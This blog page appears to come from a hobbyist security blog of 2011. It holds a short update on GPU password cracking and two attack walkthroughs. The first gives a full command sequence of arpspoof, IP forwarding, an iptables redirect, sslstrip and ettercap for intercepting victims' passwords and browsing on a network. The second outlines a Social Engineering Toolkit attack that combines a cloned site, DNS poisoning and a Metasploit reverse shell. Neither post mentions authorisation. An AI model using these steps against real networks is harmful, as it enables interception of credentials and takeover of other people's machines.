Thursday, 28 April 2011

What's to come?

Hey all,

As it has again been ages since any real updates I thought I would explain what's going on!
I finished my paper for university, which was on password cracking using parallel processors, my results will be on here but not just yet.

Now I've been playing with GPU related stuff there is going to be a fair amount of CUDA related security tools such as pyrit and crark.

Stay tuned, 

ARP spoof & ettercap

With a little bit of sslstrip and urlsnarf thrown in for good measure.

So, new blog post and vid are here this is what I did:

Firstly I edited etter.conf to allow the usage of ip tables,
then enabled ip forwarding,
next arp spoofed the broadcast address.

This step tells the router that I am the victim and the victim I am the router. You can set the I.P. to that of one machine or if you use the broadcast address, in my case 255, you can target the victims network.

The next step is to set up the iptables, this takes anything coming in on port 80 i.e. internet traffic, and puts it on to port 1000 which is where sslstrip is running.

sslstrip removes the SSL encryption, this is done by removing the request from the client for the ssl certificate.

Once you have removed this you can then do what ever you wish to the victim.

I used ettercap to capture the passwords and urlsnarf to see what the victim was accessing in realtime. You can also use driftnet which shows the images from the website that your victim is viewing.

The commands:

kate /etc/etter.conf
remove the # on the iptables for linux
echo 1 > /proc/sys/net/ipv4/ip_forward (this enables ip forwarding)
you can use cat  /proc/sys/net/ipv4/ip_forward to see the contents
arpspoof -i eth0 -t
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
sslstrip is waiting on port 1000 so
sslstrip -a -k -f  (these commands kill the session and work quietly)
ettercap -T -q -i eth0

The video:
Arp spoof vid


Tuesday, 5 April 2011

SET Java Applet Attack

I am going to be looking at Java applet attack using SET, which is the social engineering tool kit.
SET uses smart ways of exploiting the user rather than the system. This means that it's easier to get the victim to give you access rather than breaking into the system its self. 

This attack uses the Java applet attack method to firstly clone a web site and add on a fake Java applet with a payload then ettercap uses DNS poisoning to force the user to visit this web site.
Finally the payload is a metasploit reverse connection shell allowing the attack to use the metasploit commands to do whatever he wants. There will be a metasploit video coming soon!

In a shell the directory is changed of that of SET using cd /pentest/exploits/SET
execute set using ./set
update set, then exit reload set using ./set
and update the metasploit modules.

The next step is to change the settings using nano config/set_config
apt-get the 2 Java packages (you don't need both but I would always rather over do it!)
edit the config and save with ctrl + x

Reload SET and then your ready to set up a cloned website. 

Once the victim has accepted the fake java applet, you own him :D 
SET is a fantastic tool, have a look round and play with it. 


Geoffrey everything about you is sooooo Geoffrey!